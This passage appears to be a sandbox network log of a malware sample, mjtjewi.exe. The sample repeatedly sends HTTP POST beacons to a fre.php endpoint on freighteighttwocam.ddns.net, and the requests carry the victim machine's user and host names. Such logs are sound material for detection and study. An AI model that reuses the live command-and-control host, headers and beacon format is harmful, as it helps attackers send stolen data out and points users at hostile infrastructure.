                                                        Oct 3, 2024 09:22:18.709377050 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:18.714301109 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:19.379185915 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:18 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        77192.168.2.116442245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:19.542762041 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:19.547744036 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:20.358504057 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:19 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        78192.168.2.116442345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:20.561255932 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:20.566221952 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:21.203330994 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:20 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        79192.168.2.116442445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:21.351571083 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:21.356698990 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:22.048629045 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:21 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        80192.168.2.116442545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:22.215054035 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:22.220180988 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:22.910722017 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:22 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        81192.168.2.116442645.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:23.364090919 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:23.369318008 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:23.931077957 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:23 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        82192.168.2.116442745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:24.101181030 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:24.106030941 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:24.748373032 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:24 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        83192.168.2.116442845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:24.905708075 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:24.910666943 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:25.638870001 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:25 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        84192.168.2.116442945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:25.810230017 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:25.816015959 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:26.473027945 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:25 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        85192.168.2.116443045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:26.654994965 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:26.659849882 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:27.331634998 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:26 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        86192.168.2.116443145.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:27.499201059 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:27.504132032 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:28.156263113 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:27 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        87192.168.2.116443245.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:28.306813955 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:28.311778069 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:29.195664883 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:28 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        88192.168.2.116443345.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:29.634440899 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:29.639445066 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:30.480031967 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:29 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        89192.168.2.116443445.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:30.641104937 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:30.646051884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:31.486274004 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:30 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        90192.168.2.116443545.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:31.669754982 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:31.674681902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:32.303347111 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:31 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        91192.168.2.116443645.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:32.497924089 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:32.502916098 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:33.187992096 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:32 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        92192.168.2.116443745.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:33.334327936 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:33.340490103 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:34.292666912 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:33 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        93192.168.2.116443845.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:34.443031073 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:34.448158026 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:35.079196930 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:34 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        94192.168.2.116443945.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:35.220199108 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
                                                        Oct 3, 2024 09:22:35.225001097 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 74 00 6f 00 74 00 74 00 69 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 54 00 4f 00 54 00 54 00 49 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                        Data Ascii: (ckav.rutotti210979TOTTI-PC0FDD42EE188E931437F4FBE2C
                                                        Oct 3, 2024 09:22:35.848511934 CEST177INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.10.3
                                                        Date: Thu, 03 Oct 2024 07:22:35 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        X-Powered-By: PHP/5.3.3
                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                        Data Ascii: File not found.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        95192.168.2.116444045.149.241.169801392C:\Users\user\Desktop\mjtjewi.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 3, 2024 09:22:36.009468079 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                        Host: freighteighttwocam.ddns.net
                                                        Accept: */*
                                                        Content-Type: application/octet-stream
                                                        Content-Encoding: binary
                                                        Content-Key: 5EE1FC9E
                                                        Content-Length: 149
                                                        Connection: close
